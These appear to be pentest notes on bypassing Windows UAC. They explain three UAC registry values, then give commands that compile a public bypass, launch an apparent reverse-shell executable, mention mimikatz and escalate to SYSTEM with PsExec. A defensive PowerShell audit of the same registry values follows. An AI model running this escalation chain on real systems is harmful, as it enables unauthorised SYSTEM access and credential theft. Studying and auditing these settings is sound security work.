1. EnableLUA tells us whether UAC is enabled. If it is 0, we don't need to bypass it at all and can just PsExec to SYSTEM. If it is 1, however, check the other 2 keys.
2. ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but when the UAC slider in Windows settings is used it takes on either 0, 2 or 5.
3. PromptOnSecureDesktop is binary, either 0 or 1.
When 2. & 3. are default or lower (does not work when ConsentPromptBehaviorAdmin = 2 and PromptOnSecureDesktop = 1):
https://github.com/turbo/zero2hero/raw/master/main.c
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\rev1.exe");
x86_64-w64-mingw32-gcc main.c -o 64.exe
64.exe -c rev1.exe
>> can use mimikatz already
PsExec from the high-integrity shell to SYSTEM:
PsExec64.exe -accepteula -d -s C:\rev2.exe
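From the defender's side, the three values listed at the top of these notes can be audited directly. The PowerShell below is an added example, not part of the original notes: it classifies a combination of the three values and flags anything other than ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1. The helper name Get-UacPosture and the sample rows are constructed for illustration.

```powershell
# Added example: audit the UAC policy values discussed in these notes.
# Get-UacPosture is a hypothetical helper name, not a built-in cmdlet.
$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPosture {
    param($EnableLUA, $ConsentPromptBehaviorAdmin, $PromptOnSecureDesktop)

    # A missing value cannot be assessed; report it instead of guessing a default.
    if ($null -eq $EnableLUA -or $null -eq $ConsentPromptBehaviorAdmin -or
        $null -eq $PromptOnSecureDesktop) {
        return 'UNKNOWN: one or more values are not set, review manually'
    }
    if ($EnableLUA -eq 0) {
        return 'FAIL: UAC is disabled (EnableLUA = 0)'
    }
    if ($ConsentPromptBehaviorAdmin -eq 2 -and $PromptOnSecureDesktop -eq 1) {
        return 'OK: always notify on the secure desktop'
    }
    # Anything else is not the 2/1 combination the notes list as blocking the bypass.
    return 'WARN: not ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1'
}

# Constructed sample rows: UAC off, then the four UAC slider positions.
$samples = @(
    @{ EnableLUA = 0; ConsentPromptBehaviorAdmin = 5; PromptOnSecureDesktop = 1 },
    @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 2; PromptOnSecureDesktop = 1 },
    @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 5; PromptOnSecureDesktop = 1 },
    @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 5; PromptOnSecureDesktop = 0 },
    @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 0; PromptOnSecureDesktop = 0 }
)
foreach ($s in $samples) {
    $verdict = Get-UacPosture @s
    '{0}/{1}/{2} -> {3}' -f $s.EnableLUA, $s.ConsentPromptBehaviorAdmin,
        $s.PromptOnSecureDesktop, $verdict
}

# Live, read-only check of the local machine.
$live = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
if ($live) {
    $verdict = Get-UacPosture -EnableLUA $live.EnableLUA `
        -ConsentPromptBehaviorAdmin $live.ConsentPromptBehaviorAdmin `
        -PromptOnSecureDesktop $live.PromptOnSecureDesktop
    "local machine -> $verdict"
}
```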